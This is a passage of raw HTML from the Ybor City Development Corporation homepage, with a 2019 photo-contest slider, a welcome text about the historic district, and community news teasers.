href=https://yborcityonline.com/live/community-programs/>Community Programs</a></li><li id=menu-item-1999 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1999"><a href=https://yborcityonline.com/live/residential-listings/>Residential Listings</a></li><li id=menu-item-3646 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3646"><a href=https://yborcityonline.com/about/community-news/>Community News</a></li><li id=menu-item-6147 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6147"><a href=https://yborcityonline.com/available-properties/>Available Properties</a></li></ul></li><li id=menu-item-1000 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1000"><a href=https://yborcityonline.com/business/>Business</a><ul class=sub-menu><li id=menu-item-1985 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1985"><a href=https://yborcityonline.com/business/incentives-and-resources/>Business Incentives</a></li><li id=menu-item-1986 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1986"><a href=https://yborcityonline.com/business/developing-retail-resident-commercial/>Business Development</a></li><li id=menu-item-1987 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1987"><a href=https://yborcityonline.com/business/starting-your-business-in-ybor/>Starting a Business</a></li><li id=menu-item-5409 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5409"><a href=https://yborcityonline.com/about/merchant-directory/>Merchant Directory</a></li><li id=menu-item-6146 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6146"><a href=https://yborcityonline.com/available-properties/>Available Properties</a></li></ul></li><li id=menu-item-999 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-999"><a href=https://yborcityonline.com/get-around/>Get Around</a><ul class=sub-menu><li id=menu-item-4784 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4784"><a href=https://yborcityonline.com/get-around/parking/>Ybor City Parking</a></li></ul></li><li id=menu-item-6362 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6362"><a href=https://yborcityonline.com/brochure/>Brochure</a></li><li id=menu-item-998 class="menu-item menu-item-type-post_type menu-item-object-page menu-item-998"><a href=https://yborcityonline.com/contact/>Contact</a></li></ul></nav></div></div></div></div></header><section class="slider_wrap slider_fullwide slider_engine_revo slider_alias_2019-spring-photo-contest"><link href="https://fonts.googleapis.com/css?family=Roboto%3A500" rel=stylesheet property=stylesheet type=text/css media=all><div id=rev_slider_27_1_wrapper class="rev_slider_wrapper fullwidthbanner-container" style="margin:0px auto;background-color:transparent;padding:0px;margin-top:0px;margin-bottom:0px;"><div id=rev_slider_27_1 class="rev_slider fullwidthabanner" style=display:none; data-version=5.2.6><ul><li data-index=rs-59 data-transition=fade data-slotamount=default data-hideafterloop=0 data-hideslideonmobile=off data-easein=default data-easeout=default data-masterspeed=300 data-delay=13810 data-rotate=0 data-saveperformance=off data-title=Slide data-param1 data-param2 data-param3 data-param4 data-param5 data-param6 data-param7 data-param8 data-param9 data-param10 data-description> <img src=https://yborcityonline.com/wp-content/plugins/revslider/admin/assets/images/dummy.png alt title=YCDC_2019_Spring_Photo_Header width=3000 height=1943 data-lazyload=https://yborcityonline.com/wp-content/uploads/2019/03/YCDC_2019_Spring_Photo_Header.jpg data-bgposition="center center" data-bgfit=cover data-bgrepeat=no-repeat class=rev-slidebg data-no-retina><div class="tp-caption tp-resizeme" id=slide-59-layer-1 data-x="['center','center','center','center']" data-hoffset="['9','6','0','0']" data-y="['top','top','middle','middle']" data-voffset="['20','7','-47','-39']" data-width=none data-height=none data-whitespace=nowrap data-transform_idle=o:1; data-transform_in=opacity:0;s:300;e:Power2.easeInOut; data-transform_out=opacity:0;s:300; data-start=500 data-actions='[{"event":"click","action":"simplelink","target":"_self","url":"https:\/\/yborcityonline.com\/2019-spring-photo-contest\/","delay":""}]' data-responsive_offset=on style="z-index: 5;"><img src=https://yborcityonline.com/wp-content/plugins/revslider/admin/assets/images/dummy.png alt="Logo for Ybor CIty Spring Photo Contest 2019" width=1584 height=1172 data-ww="['925px','741px','480px','432px']" data-hh="['654px','480px','360px','300px']" data-lazyload=https://yborcityonline.com/wp-content/uploads/2019/03/YCDC_2019_Spring_Photo_Logo.png data-no-retina></div> <a class="tp-caption rev-btn " href=https://yborcityonline.com/2019-spring-photo-contest/ target=_self id=slide-59-layer-4 data-x="['center','center','center','center']" data-hoffset="['3','1','-2','0']" data-y="['middle','middle','middle','top']" data-voffset="['265','188','140','294']" data-fontsize="['25','25','25','17']" data-width=none data-height=none data-whitespace=nowrap data-transform_idle=o:1; data-transform_hover=o:1;rX:0;rY:0;rZ:0;z:0;s:0;e:Linear.easeNone; data-style_hover="c:rgba(0, 0, 0, 1.00);bg:rgba(255, 255, 255, 1.00);" data-transform_in=opacity:0;s:300;e:Power2.easeInOut; data-transform_out=opacity:0;s:300; data-start=500 data-splitin=none data-splitout=none data-actions data-responsive_offset=on data-responsive=off style="z-index: 6; white-space: nowrap; font-size: 25px; line-height: 17px; font-weight: 500; color: rgba(255, 255, 255, 1.00);font-family:Roboto;background-color:rgba(10, 0, 0, 0.75);padding:12px 35px 12px 35px;border-color:rgba(0, 0, 0, 1.00);border-radius:30px 30px 30px 30px;outline:none;box-shadow:none;box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;cursor:pointer;">Submit Your Photo </a><div class="tp-caption tp-resizeme" id=slide-59-layer-5 data-x="['center','center','center','center']" data-hoffset="['4','1','-2','0']" data-y="['top','middle','middle','top']" data-voffset="['792','233','189','353']" data-fontsize="['25','25','25','20']" data-fontweight="['800','800','800','700']" data-color="['rgba(255, 255, 255, 1.00)','rgba(10, 10, 10, 1.00)','rgba(10, 10, 10, 1.00)','rgba(255, 255, 255, 1.00)']" data-width=none data-height=none data-whitespace=nowrap data-transform_idle=o:1; data-transform_in=opacity:0;s:300;e:Power2.easeInOut; data-transform_out=opacity:0;s:300; data-start=500 data-splitin=none data-splitout=none data-responsive_offset=on style="z-index: 7; white-space: nowrap; font-size: 25px; line-height: 22px; font-weight: 800; color: rgba(255, 255, 255, 1.00);text-align:center;text-decoration:underline;border-color:rgba(255, 255, 255, 1.00);text-shadow:2px 2px 8px #ffffff;"><a href=https://yborcityonline.com/2018-summer-photo-contest/>View 2018 Photo Submissions</a></div></li></ul><div class="tp-bannertimer tp-bottom" style="visibility: hidden !important;"></div></div> <script>var htmlDiv=document.getElementById("rs-plugin-settings-inline-css");var htmlDivCss="";if(htmlDiv){htmlDiv.innerHTML=htmlDiv.innerHTML+htmlDivCss;}else{var htmlDiv=document.createElement("div");htmlDiv.innerHTML="<style>"+htmlDivCss+"</style>";document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]);}</script> <script>var setREVStartSize=function(){try{var e=new Object,i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0;e.c=jQuery('#rev_slider_27_1');e.responsiveLevels=[1240,1024,778,480];e.gridwidth=[0,1024,778,480];e.gridheight=[900,600,500,400];e.sliderLayout="auto";if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if(c)jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f})}catch(d){console.log("Failure at Presize of Slider:"+d)}};setREVStartSize();var tpj=jQuery;var revapi27;tpj(document).ready(function(){if(tpj("#rev_slider_27_1").revolution==undefined){revslider_showDoubleJqueryError("#rev_slider_27_1");}else{revapi27=tpj("#rev_slider_27_1").show().revolution({sliderType:"hero",jsFileLocation:"//yborcityonline.com/wp-content/plugins/revslider/public/assets/js/",sliderLayout:"auto",dottedOverlay:"none",delay:1000,navigation:{},responsiveLevels:[1240,1024,778,480],visibilityLevels:[1240,1024,778,480],gridwidth:[0,1024,778,480],gridheight:[900,600,500,400],lazyType:"single",shadow:0,spinner:"spinner0",autoHeight:"off",disableProgressBar:"on",hideThumbsOnMobile:"off",hideSliderAtLimit:0,hideCaptionAtLimit:0,hideAllCaptionAtLilmit:0,debugMode:false,fallbacks:{simplifyAll:"off",disableFocusListener:false,}});}});</script> </div></section><div class="page_content_wrap page_paddings_no"><div class=content_wrap><div class=content><article class="itemscope post_item post_item_single post_featured_default post_format_standard post-5 page type-page status-publish hentry" itemscope itemtype=http://schema.org/Article><section class=post_content itemprop=articleBody><div data-vc-full-width=true data-vc-full-width-init=false data-vc-stretch-content=true class="vc_row wpb_row vc_row-fluid welcome_box_hidden vc_custom_1480689245802 vc_row-no-padding"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class=wpb_wrapper><div class="wpb_text_column wpb_content_element "><div class=wpb_wrapper><h1><strong>Explore Florida&#8217;s National Landmark Historic District, Ybor City Development Corporation (YCDC)</strong></h1><h2>It’s not just Tampa’s playground, it’s historically different</h2><h2>thriving influx of growing corporations and small businesses</h2><h2>eclectic retail stores, diverse restaurants, and a growing number</h2><h2>of new residential units for people calling Ybor City home.</h2></div></div></div></div></div></div><div class=vc_row-full-width></div><div data-vc-full-width=true data-vc-full-width-init=false data-vc-stretch-content=true class="vc_row wpb_row vc_row-fluid slider_col vc_custom_1479849891181"><div class="wpb_column vc_column_container vc_col-sm-2"><div class="vc_column-inner "><div class=wpb_wrapper></div></div></div><div class="wpb_column vc_column_container vc_col-sm-2"><div class="vc_column-inner "><div class=wpb_wrapper><div class="wpb_single_image wpb_content_element vc_align_center"><figure class="wpb_wrapper vc_figure"><div class="vc_single_image-wrapper vc_box_border_grey"><img class="vc_single_image-img " src=https://yborcityonline.com/wp-content/uploads/2016/01/Home-Area-75x75.png width=75 height=75 alt="1 mile squared" title=home-area></div></figure></div><div class="wpb_text_column wpb_content_element "><div class=wpb_wrapper><p style="text-align: center;"><span style="color: #ffffff;">Ybor City</span></p></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-2"><div class="vc_column-inner "><div class=wpb_wrapper><div class="wpb_single_image wpb_content_element vc_align_center"><figure class="wpb_wrapper vc_figure"> <a href=https://weather.com/weather/today/l/USFL0481:1:US target=_blank class="vc_single_image-wrapper vc_box_border_grey"><img class="vc_single_image-img " src=https://yborcityonline.com/wp-content/uploads/2016/01/Home-weather-75x75.png width=75 height=75 alt="weather icon" title=home-weather></a></figure></div><div class="wpb_text_column wpb_content_element "><div class=wpb_wrapper><p style="text-align: center;"><span style="color: #ffffff;">Weather</span></p></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-2"><div class="vc_column-inner "><div class=wpb_wrapper><div class="wpb_single_image wpb_content_element vc_align_center"><figure class="wpb_wrapper vc_figure"> <a href=https://yborcityonline.com/explore/about-ybors-architecture/ target=_self class="vc_single_image-wrapper vc_box_border_grey"><img class="vc_single_image-img " src=https://yborcityonline.com/wp-content/uploads/2016/01/Home-yearfounded-75x75.png width=75 height=75 alt=1885 title=home-yearfounded></a></figure></div><div class="wpb_text_column wpb_content_element "><div class=wpb_wrapper><p style="text-align: center;"><span style="color: #ffffff;">Year of Foundation</span></p></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-2"><div class="vc_column-inner "><div class=wpb_wrapper><div class="wpb_single_image wpb_content_element vc_align_center"><figure class="wpb_wrapper vc_figure"><div class="vc_single_image-wrapper vc_box_border_grey"><img class="vc_single_image-img " src=https://yborcityonline.com/wp-content/uploads/2016/01/Home-population-1-75x75.png width=75 height=75 alt=4,708 title=home-population></div></figure></div><div class="wpb_text_column wpb_content_element "><div class=wpb_wrapper><p style="text-align: center;"><span style="color: #ffffff;">Population</span></p></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-2"><div class="vc_column-inner "><div class=wpb_wrapper></div></div></div></div><div class=vc_row-full-width></div><div data-vc-full-width=true data-vc-full-width-init=false data-vc-stretch-content=true class="vc_row wpb_row vc_row-fluid welcome_box vc_custom_1477503115811 vc_row-no-padding"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class=wpb_wrapper><div class="sc_content content_wrap margin_top_large- margin_bottom_large"><h3 style="color: #000000;text-align: center;font-family:Cinzel;font-weight:700;font-style:normal" class="vc_custom_heading home_h2">Welcome To Historic Ybor City</h3><div class="wpb_text_column wpb_content_element "><div class=wpb_wrapper><p style="text-align: justify;">There is so much more to explore in Ybor! It’s not just Tampa’s playground, it’s historically different with a thriving influx of growing corporations and small businesses, eclectic retail stores, diverse restaurants and a growing number of new residential units for people calling Ybor City home.</p><p style="text-align: justify;">Conveniently located just northeast of downtown, Ybor City is the only neighborhood on Florida’s west coast to be designated a National Historic Landmark District. Founded by Vicente Martinez-Ybor, the district has enjoyed a rich and diverse culture for more than a century.</p><p style="text-align: justify;">Ybor’s 7th Avenue, the main commercial thoroughfare was recognized as one of the “10 Great Streets in America”! Don’t just take our word for it, explore Ybor City today and find out exactly why…”There’s more in Ybor!”</p></div></div></div></div></div></div></div><div class=vc_row-full-width></div><div data-vc-full-width=true data-vc-full-width-init=false data-vc-stretch-content=true data-vc-parallax=1.5 data-vc-parallax-image=https://yborcityonline.com/wp-content/uploads/2018/08/Red-Brick-Background-50.jpg class="vc_row wpb_row vc_row-fluid vc_row-no-padding vc_general vc_parallax vc_parallax-content-moving"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class=wpb_wrapper><div class="sc_section margin_top_small-"><div class=sc_section_inner><div class="sc_content content_wrap margin_top_huge"><div id=sc_blogger_1548752753 class="sc_blogger layout_departments_4 template_departments margin_bottom_tiny sc_blogger_horizontal"><div class=isotope_wrap data-columns=4><div class="isotope_item isotope_item_departments isotope_item_departments_4 isotope_column_4 "><div class="post_item post_item_departments post_item_departments_4 post_format_standard odd"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2016/10/Explore_ybor_city.jpg data-title=Explore> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/explore/><img class=wp-post-image width=740 height=460 alt=Explore src=https://yborcityonline.com/wp-content/uploads/2016/10/Explore_ybor_city-740x460.jpg></a></div></div><div class="post_content isotope_item_content"><h4 class="post_title"><a href=https://yborcityonline.com/explore/>Explore</a></h4><div class=post_descr><p>Tampa’s premier historic district is the only neighborhood on Florida’s west...</p><a href=https://yborcityonline.com/explore/ class=post_readmore><span class=post_readmore_label>Read more</span></a></div></div></div></div><div class="isotope_item isotope_item_departments isotope_item_departments_4 isotope_column_4 "><div class="post_item post_item_departments post_item_departments_4 post_format_standard even"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2016/10/Live_ybor_city.jpg data-title=Live> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/live/><img class=wp-post-image width=740 height=460 alt=Live src=https://yborcityonline.com/wp-content/uploads/2016/10/Live_ybor_city-740x460.jpg></a></div></div><div class="post_content isotope_item_content"><h4 class="post_title"><a href=https://yborcityonline.com/live/>Live</a></h4><div class=post_descr><p>Calling Ybor City home gives people the opportunity to live where they work and...</p><a href=https://yborcityonline.com/live/ class=post_readmore><span class=post_readmore_label>Read more</span></a></div></div></div></div><div class="isotope_item isotope_item_departments isotope_item_departments_4 isotope_column_4 "><div class="post_item post_item_departments post_item_departments_4 post_format_standard odd"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2016/10/Business_ybor_city.jpg data-title=Business> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/business/><img class=wp-post-image width=740 height=460 alt=Business src=https://yborcityonline.com/wp-content/uploads/2016/10/Business_ybor_city-740x460.jpg></a></div></div><div class="post_content isotope_item_content"><h4 class="post_title"><a href=https://yborcityonline.com/business/>Business</a></h4><div class=post_descr><p>Reinvention and revival have always been a part of Ybor City's history, and they...</p><a href=https://yborcityonline.com/business/ class=post_readmore><span class=post_readmore_label>Read more</span></a></div></div></div></div><div class="isotope_item isotope_item_departments isotope_item_departments_4 isotope_column_4 "><div class="post_item post_item_departments post_item_departments_4 post_format_standard even last"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2016/10/Get_around_ybor_city.jpg data-title="Get Around"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/get-around/><img class=wp-post-image width=740 height=460 alt="Get Around" src=https://yborcityonline.com/wp-content/uploads/2016/10/Get_around_ybor_city-740x460.jpg></a></div></div><div class="post_content isotope_item_content"><h4 class="post_title"><a href=https://yborcityonline.com/get-around/>Get Around</a></h4><div class=post_descr><p>Whether you're walking the charming side streets or just looking for a place to...</p><a href=https://yborcityonline.com/get-around/ class=post_readmore><span class=post_readmore_label>Read more</span></a></div></div></div></div></div></div><div class="sc_section margin_top_small aligncenter"><div class=sc_section_inner></div></div></div></div></div></div></div></div></div><div class=vc_row-full-width></div><div data-vc-full-width=true data-vc-full-width-init=false data-vc-stretch-content=true class="vc_row wpb_row vc_row-fluid vc_custom_1477516722486 vc_row-no-padding"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class=wpb_wrapper><div class="sc_section margin_top_small- aligncenter"><div class=sc_section_inner><div class="sc_content content_wrap"><h3 class="sc_title sc_title_regular sc_align_center margin_top_small" style="margin-bottom: 1.25em;text-align:center;">Community News</h3><div id=sc_blogger_446300605 class="sc_blogger layout_classic_3 template_classic sc_blogger_horizontal sc_scroll_controls sc_scroll_controls_type_side sc_scroll_controls_horizontal"><div id=sc_blogger_446300605_scroll class="sc_scroll sc_scroll_horizontal sc_slider_noresize swiper-slider-container scroll-container" style=width:100%;><div class="sc_scroll_wrapper swiper-wrapper"><div class="sc_scroll_slide swiper-slide"><div class=isotope_wrap data-columns=3><div class="isotope_item isotope_item_classic isotope_item_classic_3 isotope_column_3 "><div class="post_item post_item_classic post_item_classic_3 post_format_standard odd"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2019/05/Capture-4.jpg data-title="J.C. Newman Breaks Ground on Multimillion Dollar Factory Expansion"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/j-c-newman-breaks-ground-on-multimillion-dollar-factory-expansion/><img class=wp-post-image width=740 height=524 alt="J.C. Newman Breaks Ground on Multimillion Dollar Factory Expansion" src=https://yborcityonline.com/wp-content/uploads/2019/05/Capture-4-740x524.jpg></a></div></div><div class="post_content isotope_item_content"><div class=post_info> <span class="post_info_item post_info_posted"> <a href=https://yborcityonline.com/j-c-newman-breaks-ground-on-multimillion-dollar-factory-expansion/ class=post_info_date>May 8, 2019</a></span></div><h5 class="post_title"><a href=https://yborcityonline.com/j-c-newman-breaks-ground-on-multimillion-dollar-factory-expansion/>J.C. Newman Breaks Ground on Multimillion Dollar Factory Expansion</a></h5><div class=post_descr><div class=post_info> <span class="post_info_item post_info_posted_by">by <a href=https://yborcityonline.com/author/hcp_anthony/ class=post_info_author>YCDC</a></span> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_comments icon-comment-1" title="Comments - 0" href=https://yborcityonline.com/j-c-newman-breaks-ground-on-multimillion-dollar-factory-expansion/#respond><span class=post_counters_number>0</span></a> <a class="post_counters_item post_counters_likes icon-heart enabled" title=Like href=# data-postid=8055 data-likes=0 data-title-like=Like data-title-dislike=Dislike><span class=post_counters_number>0</span></a> </span></div></div></div></div></div><div class="isotope_item isotope_item_classic isotope_item_classic_3 isotope_column_3 "><div class="post_item post_item_classic post_item_classic_3 post_format_standard even"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2019/05/Capture-1.jpg data-title="Mexican Cocktail Inspires Ybor City Craft Beer in Old Tampa"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/mexican-cocktail-inspires-ybor-city-craft-beer-in-old-tampa/><img class=wp-post-image width=740 height=524 alt="Mexican Cocktail Inspires Ybor City Craft Beer in Old Tampa" src=https://yborcityonline.com/wp-content/uploads/2019/05/Capture-1-740x524.jpg></a></div></div><div class="post_content isotope_item_content"><div class=post_info> <span class="post_info_item post_info_posted"> <a href=https://yborcityonline.com/mexican-cocktail-inspires-ybor-city-craft-beer-in-old-tampa/ class=post_info_date>May 2, 2019</a></span></div><h5 class="post_title"><a href=https://yborcityonline.com/mexican-cocktail-inspires-ybor-city-craft-beer-in-old-tampa/>Mexican Cocktail Inspires Ybor City Craft Beer in Old Tampa</a></h5><div class=post_descr><div class=post_info> <span class="post_info_item post_info_posted_by">by <a href=https://yborcityonline.com/author/hcp_anthony/ class=post_info_author>YCDC</a></span> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_comments icon-comment-1" title="Comments - 0" href=https://yborcityonline.com/mexican-cocktail-inspires-ybor-city-craft-beer-in-old-tampa/#respond><span class=post_counters_number>0</span></a> <a class="post_counters_item post_counters_likes icon-heart enabled" title=Like href=# data-postid=8034 data-likes=0 data-title-like=Like data-title-dislike=Dislike><span class=post_counters_number>0</span></a> </span></div></div></div></div></div><div class="isotope_item isotope_item_classic isotope_item_classic_3 isotope_column_3 "><div class="post_item post_item_classic post_item_classic_3 post_format_standard odd"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2019/03/YCDC_2019_Spring_Photo_Poster_Header.jpg data-title="Ybor City 2019 Spring Photo Contest Launched"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/ybor-city-2019-spring-photo-contest-launched/><img class=wp-post-image width=740 height=524 alt="Ybor City 2019 Spring Photo Contest Launched" src=https://yborcityonline.com/wp-content/uploads/2019/03/YCDC_2019_Spring_Photo_Poster_Header-740x524.jpg></a></div></div><div class="post_content isotope_item_content"><div class=post_info> <span class="post_info_item post_info_posted"> <a href=https://yborcityonline.com/ybor-city-2019-spring-photo-contest-launched/ class=post_info_date>March 29, 2019</a></span></div><h5 class="post_title"><a href=https://yborcityonline.com/ybor-city-2019-spring-photo-contest-launched/>Ybor City 2019 Spring Photo Contest Launched</a></h5><div class=post_descr><div class=post_info> <span class="post_info_item post_info_posted_by">by <a href=https://yborcityonline.com/author/hcp_anthony/ class=post_info_author>YCDC</a></span> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_comments icon-comment-1" title="Comments - 0" href=https://yborcityonline.com/ybor-city-2019-spring-photo-contest-launched/#respond><span class=post_counters_number>0</span></a> <a class="post_counters_item post_counters_likes icon-heart enabled" title=Like href=# data-postid=7957 data-likes=0 data-title-like=Like data-title-dislike=Dislike><span class=post_counters_number>0</span></a> </span></div></div></div></div></div><div class="isotope_item isotope_item_classic isotope_item_classic_3 isotope_column_3 "><div class="post_item post_item_classic post_item_classic_3 post_format_standard even"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2017/08/Homeruns-and-History-Copy.jpg data-title="Tampa Baseball Museum to Celebrate Local History of the Game with Free ‘Homeruns &#038; History’ Event in Ybor City March 23"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/tampa-baseball-museum-to-celebrate-local-history-of-the-game-with-free-homeruns-history-event-in-ybor-city-march-23/><img class=wp-post-image width=740 height=524 alt="Tampa Baseball Museum to Celebrate Local History of the Game with Free ‘Homeruns &#038; History’ Event in Ybor City March 23" src=https://yborcityonline.com/wp-content/uploads/2017/08/Homeruns-and-History-Copy-740x524.jpg></a></div></div><div class="post_content isotope_item_content"><div class=post_info> <span class="post_info_item post_info_posted"> <a href=https://yborcityonline.com/tampa-baseball-museum-to-celebrate-local-history-of-the-game-with-free-homeruns-history-event-in-ybor-city-march-23/ class=post_info_date>March 22, 2019</a></span></div><h5 class="post_title"><a href=https://yborcityonline.com/tampa-baseball-museum-to-celebrate-local-history-of-the-game-with-free-homeruns-history-event-in-ybor-city-march-23/>Tampa Baseball Museum to Celebrate Local History of the Game with Free ‘Homeruns &#038; History’ Event in Ybor City March 23</a></h5><div class=post_descr><div class=post_info> <span class="post_info_item post_info_posted_by">by <a href=https://yborcityonline.com/author/hcp_anthony/ class=post_info_author>YCDC</a></span> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_comments icon-comment-1" title="Comments - 0" href=https://yborcityonline.com/tampa-baseball-museum-to-celebrate-local-history-of-the-game-with-free-homeruns-history-event-in-ybor-city-march-23/#respond><span class=post_counters_number>0</span></a> <a class="post_counters_item post_counters_likes icon-heart enabled" title=Like href=# data-postid=7912 data-likes=0 data-title-like=Like data-title-dislike=Dislike><span class=post_counters_number>0</span></a> </span></div></div></div></div></div><div class="isotope_item isotope_item_classic isotope_item_classic_3 isotope_column_3 "><div class="post_item post_item_classic post_item_classic_3 post_format_standard odd"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2018/11/Rough-Riders-Parade.jpg data-title="Crowds Gather in Ybor City for St. Patrick&#8217;s Day Parade"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/crowds-gather-in-ybor-city-for-st-patricks-day-parade/><img class=wp-post-image width=740 height=524 alt="Crowds Gather in Ybor City for St. Patrick&#8217;s Day Parade" src=https://yborcityonline.com/wp-content/uploads/2018/11/Rough-Riders-Parade-740x524.jpg></a></div></div><div class="post_content isotope_item_content"><div class=post_info> <span class="post_info_item post_info_posted"> <a href=https://yborcityonline.com/crowds-gather-in-ybor-city-for-st-patricks-day-parade/ class=post_info_date>March 22, 2019</a></span></div><h5 class="post_title"><a href=https://yborcityonline.com/crowds-gather-in-ybor-city-for-st-patricks-day-parade/>Crowds Gather in Ybor City for St. Patrick&#8217;s Day Parade</a></h5><div class=post_descr><div class=post_info> <span class="post_info_item post_info_posted_by">by <a href=https://yborcityonline.com/author/hcp_anthony/ class=post_info_author>YCDC</a></span> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_comments icon-comment-1" title="Comments - 0" href=https://yborcityonline.com/crowds-gather-in-ybor-city-for-st-patricks-day-parade/#respond><span class=post_counters_number>0</span></a> <a class="post_counters_item post_counters_likes icon-heart enabled" title=Like href=# data-postid=7906 data-likes=0 data-title-like=Like data-title-dislike=Dislike><span class=post_counters_number>0</span></a> </span></div></div></div></div></div><div class="isotope_item isotope_item_classic isotope_item_classic_3 isotope_column_3 "><div class="post_item post_item_classic post_item_classic_3 post_format_standard even last"><div class=post_featured><div class=post_thumb data-image=https://yborcityonline.com/wp-content/uploads/2019/02/YCDC_Facebook-Aerial-Shot-1.jpg data-title="Ybor City Launches Vision 2020- Tampa Bay Newswire"> <a class="hover_icon hover_icon_link" href=https://yborcityonline.com/ybor-city-launches-vision-2020-tampa-bay-newswire/><img class=wp-post-image width=740 height=524 alt="Ybor City Launches Vision 2020- Tampa Bay Newswire" src=https://yborcityonline.com/wp-content/uploads/2019/02/YCDC_Facebook-Aerial-Shot-1-740x524.jpg></a></div></div><div class="post_content isotope_item_content"><div class=post_info> <span class="post_info_item post_info_posted"> <a href=https://yborcityonline.com/ybor-city-launches-vision-2020-tampa-bay-newswire/ class=post_info_date>February 26, 2019</a></span></div><h5 class="post_title"><a href=https://yborcityonline.com/ybor-city-launches-vision-2020-tampa-bay-newswire/>Ybor City Launches Vision 2020- Tampa Bay Newswire</a></h5><div class=post_descr><div class=post_info> <span class="post_info_item post_info_posted_by">by <a href=https://yborcityonline.com/author/ycdc_web/ class=post_info_author>YCDC Administrator</a></span> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_comments icon-comment-1" title="Comments - 0" href=https://yborcityonline.com/ybor-city-launches-vision-2020-tampa-bay-newswire/#respond><span class=post_counters_number>0</span></a> <a class="post_counters_item post_counters_likes icon-heart enabled" title=Like href=# data-postid=7860 data-likes=0 data-title-like=Like data-title-dislike=Dislike><span class=post_counters_number>0</span></a> </span></div></div></div></div></div></div></div></div><div id=sc_blogger_446300605_scroll_bar class="sc_scroll_bar sc_scroll_bar_horizontal sc_blogger_446300605_scroll_bar"></div></div><div class=sc_scroll_controls_wrap><a class=sc_scroll_prev href=#></a><a class=sc_scroll_next href=#></a></div></div><a href=https://yborcityonline.com/about/community-news/ class="sc_button sc_button_square sc_button_style_filled style_original sc_button_size_large margin_top_medium margin_bottom_huge">See All News</a></div></div></div></div></div></div></div><div class=vc_row-full-width></div><div data-vc-full-width=true data-vc-full-width-init=false class="vc_row wpb_row vc_row-fluid vc_custom_1479227090730"><div class="wpb_column vc_column_container vc_col-sm-8"><div class="vc_column-inner "><div class=wpb_wrapper><h4 class="sc_title sc_title_underline sc_align_center" style="text-align:center;color:#ffffff;">Write your history on a custom Ybor City paver</h4><div class="vc_btn3-container vc_btn3-center"> <a class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-rounded vc_btn3-style-modern vc_btn3-color-grey" href=https://yborcityonline.com/paver-program/ title>Apply Today</a></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="vc_column-inner "><div class=wpb_wrapper><div class="wpb_single_image wpb_content_element vc_align_center"><figure class="wpb_wrapper vc_figure"> <a href=https://yborcityonline.com/paver-program/ target=_self class="vc_single_image-wrapper vc_box_border_grey"><img width=236 height=164 src=https://yborcityonline.com/wp-content/uploads/2016/01/YCDC-Paver-Program-Icon.png class="vc_single_image-img attachment-medium" alt="Paver icon that reads &quot;write your own history&quot;" 